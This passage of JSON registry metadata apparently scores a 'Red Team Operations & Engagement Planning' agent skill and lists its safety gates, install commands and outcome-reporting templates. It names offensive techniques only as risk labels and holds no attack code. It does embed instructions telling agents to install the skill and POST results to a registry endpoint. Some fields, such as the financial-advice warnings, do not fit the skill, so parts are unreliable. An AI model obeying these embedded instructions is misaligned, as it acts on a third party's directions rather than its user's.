Operations & Engagement Planning"},{"id":"install_safety","label":"Install command safety","score":92,"weight":0.1,"status":"pass","detail":"standard package or runtime install path"},{"id":"permission_surface","label":"Permission surface","score":22,"weight":0.07,"status":"fail","detail":"secrets or environment access, shell or command execution"},{"id":"repository","label":"Repository evidence","score":86,"weight":0.04,"status":"pass","detail":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops"},{"id":"review_status","label":"Review status","score":66,"weight":0.05,"status":"info","detail":"AI review data available"},{"id":"agent_outcomes","label":"Agent Proven outcomes","score":54,"weight":0.13,"status":"info","detail":"No agent outcome data yet"}],"checks":[{"status":"info","label":"GitHub adoption","detail":"397 GitHub stars"},{"status":"info","label":"Stars/forks activity","detail":"397 stars, 75 forks; issue activity unavailable in current metadata"},{"status":"pass","label":"Recent maintenance","detail":"2d since push"},{"status":"pass","label":"License clarity","detail":"MIT"},{"status":"pass","label":"README/SKILL.md completeness","detail":"Metadata includes enough usage and workflow context"},{"status":"fail","label":"Dependency/runtime risk","detail":"command execution surface, credential or environment access"},{"status":"pass","label":"Install availability","detail":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning"},{"status":"pass","label":"Install command safety","detail":"standard package or runtime install path"},{"status":"fail","label":"Permission surface","detail":"secrets or environment access, shell or command execution"},{"status":"pass","label":"Repository evidence","detail":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops"},{"status":"info","label":"Review status","detail":"AI review data available"},{"status":"info","label":"Agent Proven outcomes","detail":"No agent outcome data yet"},{"status":"warn","label":"Ownership","detail":"No approved owner claim yet"},{"status":"info","label":"OpenAgentSkill usage","detail":"No local usage activity yet"},{"status":"info","label":"Agent outcomes","detail":"No agent outcome data yet"}],"strengths":["AI review approved","Install path is available","Repository evidence is available","Recently maintained repository","Install command has no obvious high-risk pattern"],"warnings":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access","Permission surface: secrets or environment access, shell or command execution"],"evidence":{"stars":"397 GitHub stars","repoActivity":"397 stars, 75 forks","lastPushed":"2d since push","license":"MIT","repository":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops","install":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","installSafety":"standard package or runtime install path","permissionSurface":"secrets or environment access, shell or command execution","documentation":"Strong README/SKILL.md context","agentOutcomes":"No agent outcome data yet"},"installReadiness":{"ready":true,"command":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","policy":"human_review_before_install","label":"Human review before install","notes":["Install path is available","Repository evidence is available","License is declared","No Agent Proven outcome evidence yet","2d since push","Financial domain: human review is required before use in a live investment workflow."]},"agentCompatibility":["Codex","Claude Code","Cursor","OpenAgentSkill CLI"],"riskSummary":{"level":"medium","label":"Review before production","notes":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access"]},"outcomeEvidence":{"total":0,"successes":0,"failures":0,"notRelevant":0,"successRate":null,"installAttempts":0,"riskBlocked":0,"setupRequired":0,"installSuccessRate":null,"avgOutputQuality":null,"avgTimeToUsefulMs":null,"productionOutcomes":0,"humanReviewRequired":0,"recentSuccessRate":null,"recentFailureRate":null,"uniqueAgents":0,"agentProvenScore":0,"agentProvenLabel":"Needs first agent run","lastOutcomeAt":null,"label":"No agent outcome data yet"},"autoInstall":{"allowed":false,"sandboxRequired":true,"policy":"human_review_before_install","reason":"Human review or sandbox validation is required before automatic installation."},"bestFor":["design-creative","cybersecurity","red-team","c2","lateral-movement","persistence"],"doNotUseFor":["Production credentials, payments, or irreversible account changes without explicit human review","Sensitive private data before reviewing repository code, license, and permission surface","Automatic installation in a production workspace","Autonomous investment, trading, tax, or suitability decisions without a qualified human review"],"knownRisks":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access","Permission surface: secrets or environment access, shell or command execution"]},"agent_proven":{"version":"agent-proven-v1","score":0,"tier":"unproven","label":"Needs first agent run","summary":"No agent outcome reports yet. Use Resolve, run one narrow sandbox task, then report the result.","metrics":{"totalOutcomes":0,"successfulOutcomes":0,"failedOutcomes":0,"installAttempts":0,"installSuccessRate":null,"successRate":null,"recentSuccessRate":null,"recentFailureRate":null,"riskBlocked":0,"setupRequired":0,"notRelevant":0,"avgOutputQuality":null,"avgTimeToUsefulMs":null,"productionOutcomes":0,"humanReviewRequired":0,"uniqueAgents":0,"lastOutcomeAt":null},"signals":[],"penalties":["No real agent outcome evidence yet"]},"outcome_stats":null,"safety":{"score":33,"level":"avoid_auto_install","label":"Avoid automatic install","safety_tier":{"tier":"blocked","label":"Blocked for auto-install","badge":"BLOCKED","summary":"This skill should not be selected by an agent without explicit human security review.","recommended_action":"Do not auto-install. Inspect the source, dependencies, and permission surface first.","auto_install_policy":"block","reasons":["Metadata combines secrets access with shell or command execution","High-risk permission hints: Shell or command execution, Secrets or environment access"]},"auto_install_allowed":false,"human_review_required":true,"blocked":true,"audit_risk":"needs_review","permission_hints":[{"id":"shell","label":"Shell or command execution","reason":"Skill metadata references terminal, CLI, shell, subprocess, or command execution workflows.","severity":"high"},{"id":"browser","label":"Browser automation","reason":"Skill may drive a browser or interact with web pages.","severity":"medium"},{"id":"network","label":"Network access","reason":"Skill likely fetches remote pages, APIs, repositories, or external services.","severity":"medium"},{"id":"filesystem","label":"Filesystem access","reason":"Skill may read or write project files, documents, generated artifacts, or local workspace state.","severity":"medium"},{"id":"secrets","label":"Secrets or environment access","reason":"Skill metadata references credentials, tokens, environment variables, or secret-bearing workflows.","severity":"high"}],"policy_warnings":["High-risk permission hints: Shell or command execution, Secrets or environment access","Dependency or permission surface needs review"],"constraints_applied":{"max_risk":"medium","needs_install_command":true,"min_stars":0}},"safety_gate":{"tier":"blocked","label":"Blocked for auto-install","badge":"BLOCKED","auto_install_policy":"block","auto_install_allowed":false,"blocked":true,"human_review_required":true,"recommended_action":"Do not auto-install. Inspect the source, dependencies, and permission surface first.","reasons":["Metadata combines secrets access with shell or command execution","High-risk permission hints: Shell or command execution, Secrets or environment access"]},"eval":{"version":"openagentskill-skill-eval-v1","status":"failed","score":67,"risk_level":"high","decision":{"recommendation":"do_not_auto_install","reason":"Agent safety gate: This skill should not be selected by an agent without explicit human security review.","auto_install_allowed":false,"policy":"block","human_review_required":true},"blockers":["Agent safety gate: This skill should not be selected by an agent without explicit human security review.","Permission surface: secrets or environment access, shell or command execution"],"warnings":["Trust score: Potentially useful, but at least one trust signal needs human inspection.","Audit score: Needs review","High-risk permission hints: Shell or command execution, Secrets or environment access","Dependency or permission surface needs review","Permission surface may require sandboxing","Financial research output is not financial advice; require human review before any live investment decision","The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","The script `engagement_planner.py` is provided but not fully reviewed; it appears to generate planning documents only and does not execute attacks.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access"],"validation_plan":["Inspect repository, README/SKILL.md, license, and recent commits before production use.","Install in an isolated workspace or sandbox with no production secrets available.","Run the smallest representative task and record files touched, commands run, network access, and outputs.","Compare the selected skill against at least one alternative when the eval status is review or failed.","Promote only after the agent reports a successful verification result and unresolved warnings are accepted."],"checks":[{"id":"task_fit","label":"Task fit","status":"pass","score":94,"required_for_auto_install":true,"detail":"Task wording matches this skill metadata.","evidence":["Evaluate Red Team Operations & Engagement Planning before installing it in an agent workflow","design-creative","Research agents workflows; Claude Code teams; builders willing to evaluate younger projects"]},{"id":"install_path","label":"Install path","status":"pass","score":92,"required_for_auto_install":true,"detail":"Install handoff is available.","evidence":["npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning"]},{"id":"install_safety","label":"Install command safety","status":"pass","score":92,"required_for_auto_install":true,"detail":"standard package or runtime install path","evidence":["npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning"]},{"id":"trust_score","label":"Trust score","status":"warn","score":66,"required_for_auto_install":true,"detail":"Potentially useful, but at least one trust signal needs human inspection.","evidence":["Manual review","397 GitHub stars","MIT"]},{"id":"audit_score","label":"Audit score","status":"warn","score":77,"required_for_auto_install":true,"detail":"Needs review","evidence":["Dependency or permission surface needs review"]},{"id":"agent_safety_gate","label":"Agent safety gate","status":"fail","score":33,"required_for_auto_install":true,"detail":"This skill should not be selected by an agent without explicit human security review.","evidence":["Do not auto-install. Inspect the source, dependencies, and permission surface first.","Metadata combines secrets access with shell or command execution"]},{"id":"readme_skillmd_completeness","label":"README/SKILL.md completeness","status":"pass","score":94,"required_for_auto_install":false,"detail":"Metadata includes enough usage and workflow context","evidence":["Strong README/SKILL.md context"]},{"id":"license_clarity","label":"License clarity","status":"pass","score":86,"required_for_auto_install":true,"detail":"MIT","evidence":["MIT"]},{"id":"recent_maintenance","label":"Recent maintenance","status":"pass","score":100,"required_for_auto_install":false,"detail":"2d since push","evidence":["2d since push"]},{"id":"permission_surface","label":"Permission surface","status":"fail","score":22,"required_for_auto_install":true,"detail":"secrets or environment access, shell or command execution","evidence":["Shell or command execution: high","Browser automation: medium","Network access: medium"]},{"id":"alternatives","label":"Alternatives available","status":"info","score":55,"required_for_auto_install":false,"detail":"No close alternatives were found in the current shortlist.","evidence":[]}],"endpoints":{"web":"https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning/evals","api":"/api/agent/evals?slug=masriyan-red-team-operations-engagement-planning","text":"/api/agent/evals?slug=masriyan-red-team-operations-engagement-planning&format=text"}},"agent_readable_metadata":{"version":"openagentskill-agent-metadata-v2","skill":{"slug":"masriyan-red-team-operations-engagement-planning","name":"Red Team Operations & Engagement Planning","description":"Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting","category":"design-creative","url":"https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning","repository":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops","github_repo":"Masriyan/Claude-Code-CyberSecurity-Skill"},"suited_tasks":["Research agents workflows","Claude Code teams","builders willing to evaluate younger projects","Search sources","Extract claims","Synthesize findings","Move data between tools","Transform files"],"suited_agents":["Codex","Claude Code","Cursor","OpenAgentSkill CLI","Browser agents","CLI"],"install":{"command":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","ready":true,"targets":[{"id":"openagentskill-cli","label":"CLI","kind":"command","value":"npx --yes https://github.com/Leon-Drq/openagentskill/releases/download/cli-v0.3.0/openagentskill-0.3.0.tgz add masriyan-red-team-operations-engagement-planning"},{"id":"codex","label":"Codex","kind":"agent-prompt","value":"Install the \"Red Team Operations & Engagement Planning\" agent skill from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {\"event_id\":\"install_<unique-id>\",\"skill_slug\":\"masriyan-red-team-operations-engagement-planning\",\"task\":\"Install Red Team Operations & Engagement Planning\",\"agent\":\"codex\",\"outcome\":\"success\",\"install_used\":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes."},{"id":"claude-code","label":"Claude Code","kind":"agent-prompt","value":"Add \"Red Team Operations & Engagement Planning\" as a Claude Code skill from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops. Inspect the skill instructions, place the reusable skill files in the appropriate local skills location for this project, and report the activation steps. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {\"event_id\":\"install_<unique-id>\",\"skill_slug\":\"masriyan-red-team-operations-engagement-planning\",\"task\":\"Install Red Team Operations & Engagement Planning\",\"agent\":\"claude-code\",\"outcome\":\"success\",\"install_used\":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes."},{"id":"cursor","label":"Cursor","kind":"agent-prompt","value":"Turn \"Red Team Operations & Engagement Planning\" from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops into a reusable Cursor project rule or agent instruction. Preserve the core workflow, adapt paths to this repo, and keep the rule scoped to tasks where it is relevant. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {\"event_id\":\"install_<unique-id>\",\"skill_slug\":\"masriyan-red-team-operations-engagement-planning\",\"task\":\"Install Red Team Operations & Engagement Planning\",\"agent\":\"cursor\",\"outcome\":\"success\",\"install_used\":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes."}],"handoff_url":"https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install","manifest_url":"https://www.openagentskill.com/api/registry/manifest/masriyan-red-team-operations-engagement-planning"},"trust":{"score":66,"label":"Manual review","version":"trust-score-v4","install_policy":"human_review_before_install","evidence":{"stars":"397 GitHub stars","repoActivity":"397 stars, 75 forks","lastPushed":"2d since push","license":"MIT","repository":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops","install":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","installSafety":"standard package or runtime install path","permissionSurface":"secrets or environment access, shell or command execution","documentation":"Strong README/SKILL.md context","agentOutcomes":"No agent outcome data yet"},"outcome_evidence":{"total":0,"successes":0,"failures":0,"not_relevant":0,"success_rate":null,"recent_success_rate":null,"recent_failure_rate":null,"install_attempts":0,"install_success_rate":null,"risk_blocked":0,"setup_required":0,"avg_output_quality":null,"production_outcomes":0,"last_outcome_at":null,"label":"No agent outcome data yet"},"auto_install":{"allowed":false,"sandbox_required":true,"reason":"Human review or sandbox validation is required before automatic installation."},"best_for":["design-creative","cybersecurity","red-team","c2","lateral-movement","persistence"],"known_risks":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access","Permission surface: secrets or environment access, shell or command execution"]},"agent_proven":{"version":"agent-proven-v1","score":0,"tier":"unproven","label":"Needs first agent run","summary":"No agent outcome reports yet. Use Resolve, run one narrow sandbox task, then report the result.","metrics":{"totalOutcomes":0,"successfulOutcomes":0,"failedOutcomes":0,"installAttempts":0,"installSuccessRate":null,"successRate":null,"recentSuccessRate":null,"recentFailureRate":null,"riskBlocked":0,"setupRequired":0,"notRelevant":0,"avgOutputQuality":null,"avgTimeToUsefulMs":null,"productionOutcomes":0,"humanReviewRequired":0,"uniqueAgents":0,"lastOutcomeAt":null},"signals":[],"penalties":["No real agent outcome evidence yet"]},"audit":{"score":77,"risk_level":"needs_review","risk_label":"Needs review","warnings":["Dependency or permission surface needs review","Permission surface may require sandboxing","Financial research output is not financial advice; require human review before any live investment decision","The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","The script `engagement_planner.py` is provided but not fully reviewed; it appears to generate planning documents only and does not execute attacks.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution"]},"safety_gate":{"tier":"blocked","label":"Blocked for auto-install","auto_install_policy":"block","auto_install_allowed":false,"human_review_required":true,"blocked":true,"recommended_action":"Do not auto-install. Inspect the source, dependencies, and permission surface first."},"quality":{"score":77,"label":"Strong"},"supply":{"track":"Research and knowledge work","scenario":"Research agents","maintenance":"2d since push","risk":"Needs review"},"alternative_skills":[],"do_not_use_when":["teams that need a vendor-supported SLA","production agents without a repository review","The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","No OpenAgentSkill engagement data yet","High-risk permission hints: Shell or command execution, Secrets or environment access","Dependency or permission surface needs review","Permission surface may require sandboxing","Financial research output is not financial advice; require human review before any live investment decision"],"agent_contract":{"task_input":"Use Red Team Operations & Engagement Planning in an agent workflow","recommended_action":"Do not auto-install. Inspect the source, dependencies, and permission surface first.","install_policy":"block","minimum_review_before_use":["Trust: 66/100 Manual review","Audit: 77/100 Needs review","Safety: 33/100 Avoid automatic install","Review repository, license, install command, and permission surface before production use."],"expected_agent_output":{"selected_skill":"masriyan-red-team-operations-engagement-planning (Red Team Operations & Engagement Planning)","install_command":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","risk_summary":"Needs review; Blocked for auto-install; Review before production","verification_result":"Report the smallest successful task, files touched, warnings, and any missing setup."}},"outcome_feedback":{"endpoint":"https://www.openagentskill.com/api/agent/outcome","method":"POST","requires_resolve_event_id":true,"event_id_source":"Use install_receipt.outcome_feedback.event_id or feedback.event_id returned by /api/agent/resolve for the current task.","expected_outcomes":["success","failed","not_relevant","blocked_by_risk","setup_required"],"payload_template":{"event_id":"<install_receipt.outcome_feedback.event_id or feedback.event_id from /api/agent/resolve>","skill_slug":"masriyan-red-team-operations-engagement-planning","task":"Use Red Team Operations & Engagement Planning in an agent workflow","agent":"codex","outcome":"success","install_used":true,"risk_blocked":false,"setup_required":false,"task_success":true,"output_quality":4,"error_type":null,"human_review_required":false,"workspace":"sandbox","time_to_useful_ms":120000,"notes":"Report the smallest successful task, setup friction, files touched, and risk notes."}},"endpoints":{"web":"https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning","api":"https://www.openagentskill.com/api/agent/skills/masriyan-red-team-operations-engagement-planning","audit":"https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning/audit","eval":"https://www.openagentskill.com/api/agent/evals?slug=masriyan-red-team-operations-engagement-planning&task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20in%20an%20agent%20workflow&max_risk=medium","resolve":"https://www.openagentskill.com/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20in%20an%20agent%20workflow&agent=codex&max_risk=medium","receipt":"https://www.openagentskill.com/api/agent/receipt?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20in%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text","install":"https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install","manifest":"https://www.openagentskill.com/api/registry/manifest/masriyan-red-team-operations-engagement-planning"}},"machine_metadata":{"version":"openagentskill-agent-metadata-v2","skill":{"slug":"masriyan-red-team-operations-engagement-planning","name":"Red Team Operations & Engagement Planning","description":"Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting","category":"design-creative","url":"https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning","repository":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops","github_repo":"Masriyan/Claude-Code-CyberSecurity-Skill"},"suited_tasks":["Research agents workflows","Claude Code teams","builders willing to evaluate younger projects","Search sources","Extract claims","Synthesize findings","Move data between tools","Transform files"],"suited_agents":["Codex","Claude Code","Cursor","OpenAgentSkill CLI","Browser agents","CLI"],"install":{"command":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","ready":true,"targets":[{"id":"openagentskill-cli","label":"CLI","kind":"command","value":"npx --yes https://github.com/Leon-Drq/openagentskill/releases/download/cli-v0.3.0/openagentskill-0.3.0.tgz add masriyan-red-team-operations-engagement-planning"},{"id":"codex","label":"Codex","kind":"agent-prompt","value":"Install the \"Red Team Operations & Engagement Planning\" agent skill from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {\"event_id\":\"install_<unique-id>\",\"skill_slug\":\"masriyan-red-team-operations-engagement-planning\",\"task\":\"Install Red Team Operations & Engagement Planning\",\"agent\":\"codex\",\"outcome\":\"success\",\"install_used\":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes."},{"id":"claude-code","label":"Claude Code","kind":"agent-prompt","value":"Add \"Red Team Operations & Engagement Planning\" as a Claude Code skill from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops. Inspect the skill instructions, place the reusable skill files in the appropriate local skills location for this project, and report the activation steps. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {\"event_id\":\"install_<unique-id>\",\"skill_slug\":\"masriyan-red-team-operations-engagement-planning\",\"task\":\"Install Red Team Operations & Engagement Planning\",\"agent\":\"claude-code\",\"outcome\":\"success\",\"install_used\":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes."},{"id":"cursor","label":"Cursor","kind":"agent-prompt","value":"Turn \"Red Team Operations & Engagement Planning\" from https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops into a reusable Cursor project rule or agent instruction. Preserve the core workflow, adapt paths to this repo, and keep the rule scoped to tasks where it is relevant. Skill purpose: Authorized red team engagement planning, C2 architecture design, attack methodology, lateral movement strategy, OPSEC, and professional reporting After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {\"event_id\":\"install_<unique-id>\",\"skill_slug\":\"masriyan-red-team-operations-engagement-planning\",\"task\":\"Install Red Team Operations & Engagement Planning\",\"agent\":\"cursor\",\"outcome\":\"success\",\"install_used\":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes."}],"handoff_url":"https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install","manifest_url":"https://www.openagentskill.com/api/registry/manifest/masriyan-red-team-operations-engagement-planning"},"trust":{"score":66,"label":"Manual review","version":"trust-score-v4","install_policy":"human_review_before_install","evidence":{"stars":"397 GitHub stars","repoActivity":"397 stars, 75 forks","lastPushed":"2d since push","license":"MIT","repository":"https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill/tree/main/skills/14-red-team-ops","install":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","installSafety":"standard package or runtime install path","permissionSurface":"secrets or environment access, shell or command execution","documentation":"Strong README/SKILL.md context","agentOutcomes":"No agent outcome data yet"},"outcome_evidence":{"total":0,"successes":0,"failures":0,"not_relevant":0,"success_rate":null,"recent_success_rate":null,"recent_failure_rate":null,"install_attempts":0,"install_success_rate":null,"risk_blocked":0,"setup_required":0,"avg_output_quality":null,"production_outcomes":0,"last_outcome_at":null,"label":"No agent outcome data yet"},"auto_install":{"allowed":false,"sandbox_required":true,"reason":"Human review or sandbox validation is required before automatic installation."},"best_for":["design-creative","cybersecurity","red-team","c2","lateral-movement","persistence"],"known_risks":["The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution","Dependency/runtime risk: command execution surface, credential or environment access","Permission surface: secrets or environment access, shell or command execution"]},"agent_proven":{"version":"agent-proven-v1","score":0,"tier":"unproven","label":"Needs first agent run","summary":"No agent outcome reports yet. Use Resolve, run one narrow sandbox task, then report the result.","metrics":{"totalOutcomes":0,"successfulOutcomes":0,"failedOutcomes":0,"installAttempts":0,"installSuccessRate":null,"successRate":null,"recentSuccessRate":null,"recentFailureRate":null,"riskBlocked":0,"setupRequired":0,"notRelevant":0,"avgOutputQuality":null,"avgTimeToUsefulMs":null,"productionOutcomes":0,"humanReviewRequired":0,"uniqueAgents":0,"lastOutcomeAt":null},"signals":[],"penalties":["No real agent outcome evidence yet"]},"audit":{"score":77,"risk_level":"needs_review","risk_label":"Needs review","warnings":["Dependency or permission surface needs review","Permission surface may require sandboxing","Financial research output is not financial advice; require human review before any live investment decision","The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","The script `engagement_planner.py` is provided but not fully reviewed; it appears to generate planning documents only and does not execute attacks.","Financial research output is not financial advice; require human review before any live investment decision.","Quality score needs review","Permission surface needs review: secrets or environment access, shell or command execution"]},"safety_gate":{"tier":"blocked","label":"Blocked for auto-install","auto_install_policy":"block","auto_install_allowed":false,"human_review_required":true,"blocked":true,"recommended_action":"Do not auto-install. Inspect the source, dependencies, and permission surface first."},"quality":{"score":77,"label":"Strong"},"supply":{"track":"Research and knowledge work","scenario":"Research agents","maintenance":"2d since push","risk":"Needs review"},"alternative_skills":[],"do_not_use_when":["teams that need a vendor-supported SLA","production agents without a repository review","The skill contains detailed offensive security techniques (e.g., Kerberoasting, DCSync, Mimikatz) which could be misused if the authorization gate is bypassed, but the gate is strongly enforced.","No OpenAgentSkill engagement data yet","High-risk permission hints: Shell or command execution, Secrets or environment access","Dependency or permission surface needs review","Permission surface may require sandboxing","Financial research output is not financial advice; require human review before any live investment decision"],"agent_contract":{"task_input":"Use Red Team Operations & Engagement Planning in an agent workflow","recommended_action":"Do not auto-install. Inspect the source, dependencies, and permission surface first.","install_policy":"block","minimum_review_before_use":["Trust: 66/100 Manual review","Audit: 77/100 Needs review","Safety: 33/100 Avoid automatic install","Review repository, license, install command, and permission surface before production use."],"expected_agent_output":{"selected_skill":"masriyan-red-team-operations-engagement-planning (Red Team Operations & Engagement Planning)","install_command":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement Planning","risk_summary":"Needs review; Blocked for auto-install; Review before production","verification_result":"Report the smallest successful task, files touched, warnings, and any missing setup."}},"outcome_feedback":{"endpoint":"https://www.openagentskill.com/api/agent/outcome","method":"POST","requires_resolve_event_id":true,"event_id_source":"Use install_receipt.outcome_feedback.event_id or feedback.event_id returned by /api/agent/resolve for the current task.","expected_outcomes":["success","failed","not_relevant","blocked_by_risk","setup_required"],"payload_template":{"event_id":"<install_receipt.outcome_feedback.event_id or feedback.event_id from /api/agent/resolve>","skill_slug":"masriyan-red-team-operations-engagement-planning","task":"Use Red Team Operations & Engagement Planning in an agent workflow","agent":"codex","outcome":"success","install_used":true,"risk_blocked":false,"setup_required":false,"task_success":true,"output_quality":4,"error_type":null,"human_review_required":false,"workspace":"sandbox","time_to_useful_ms":120000,"notes":"Report the smallest successful task, setup friction, files touched, and risk notes."}},"endpoints":{"web":"https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning","api":"https://www.openagentskill.com/api/agent/skills/masriyan-red-team-operations-engagement-planning","audit":"https://www.openagentskill.com/skills/masriyan-red-team-operations-engagement-planning/audit","eval":"https://www.openagentskill.com/api/agent/evals?slug=masriyan-red-team-operations-engagement-planning&task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20in%20an%20agent%20workflow&max_risk=medium","resolve":"https://www.openagentskill.com/api/agent/resolve?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20in%20an%20agent%20workflow&agent=codex&max_risk=medium","receipt":"https://www.openagentskill.com/api/agent/receipt?task=Use%20Red%20Team%20Operations%20%26%20Engagement%20Planning%20in%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text","install":"https://www.openagentskill.com/api/skills/masriyan-red-team-operations-engagement-planning/install","manifest":"https://www.openagentskill.com/api/registry/manifest/masriyan-red-team-operations-engagement-planning"}},"supply_profile":{"track":{"slug":"research","label":"Research and knowledge work","shortLabel":"Research","description":"Deep research, source comparison, literature review, RAG, knowledge search, and reports."},"scenario":{"label":"Research agents","description":"I need my agent to research a topic, compare sources, and produce a concise report.","useCases":[{"slug":"research-agents","title":"Research agents"},{"slug":"workflow-automation","title":"Workflow automation"},{"slug":"testing-qa","title":"Testing and QA"}]},"applicableAgents":["Claude Code","Browser agents","CLI","Codex","Cursor"],"install":{"ready":true,"command":"npx skills add Masriyan/Claude-Code-CyberSecurity-Skill --skill Red Team Operations & Engagement 